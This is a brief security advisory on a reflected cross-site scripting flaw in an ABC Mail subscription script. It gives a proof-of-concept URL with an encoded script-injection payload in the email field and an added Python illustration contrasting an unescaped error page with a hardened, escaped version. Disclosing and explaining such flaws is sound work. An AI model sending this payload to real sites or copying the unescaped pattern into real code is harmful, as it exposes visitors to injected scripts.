Overview
The ABC Mail subscription script neither sanitises the email field nor checks that a valid email address was provided. An attack can easily be executed because the unsanitised "invalid email" value is reflected verbatim in the resulting error page, which makes this a reflected cross-site scripting (XSS) issue.

Code:
http://abcmail.net.au/subscribe/subscribe.tml?
email=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
&list=abc-tv-countdown-to-3
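The following is an added illustration, not the ABC Mail script itself (its source is not on this page): a minimal model of the flaw described above, an error page that echoes the rejected email without validation or encoding, beside a hardened version that validates the address and HTML-escapes anything it reflects. The request parameters are taken from the proof-of-concept URL above; the page markup, the EMAIL_RE pattern and all function names are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed from the advisory's proof-of-concept URL (joined onto one line).
POC_URL = ("http://abcmail.net.au/subscribe/subscribe.tml?"
           "email=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E"
           "&list=abc-tv-countdown-to-3")

# Deliberately simple syntax check (assumption, not the vendor's rule): one
# local part, one '@', a dotted domain. The point is that a check exists at all
# and that output is encoded regardless of whether the check passes.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def params_from_url(url: str) -> dict:
    """Decode the query string the way the subscription script would see it."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}

def error_page_vulnerable(email: str, list_name: str) -> str:
    """Models the flaw in the advisory: the rejected value is written straight
    into the HTML error page, so '">' closes the attribute and the rest of the
    input becomes markup."""
    return (f"<p>Could not subscribe <input value=\"{email}\"> to {list_name}: "
            "invalid email</p>")

def error_page_hardened(email: str, list_name: str) -> str:
    """Validate first; whatever is echoed back is HTML-escaped with quotes
    encoded, so neither attribute nor element context can be broken out of."""
    safe_list = html.escape(list_name, quote=True)
    if not EMAIL_RE.match(email):
        shown = html.escape(email, quote=True)
        return (f"<p>Could not subscribe <input value=\"{shown}\"> to "
                f"{safe_list}: invalid email</p>")
    return f"<p>Subscribed {html.escape(email, quote=True)} to {safe_list}</p>"

def is_reflected_unescaped(page: str, marker: str) -> bool:
    """Detection helper for a test suite: does a raw markup fragment from the
    request survive unencoded into the response body?"""
    return marker in page
```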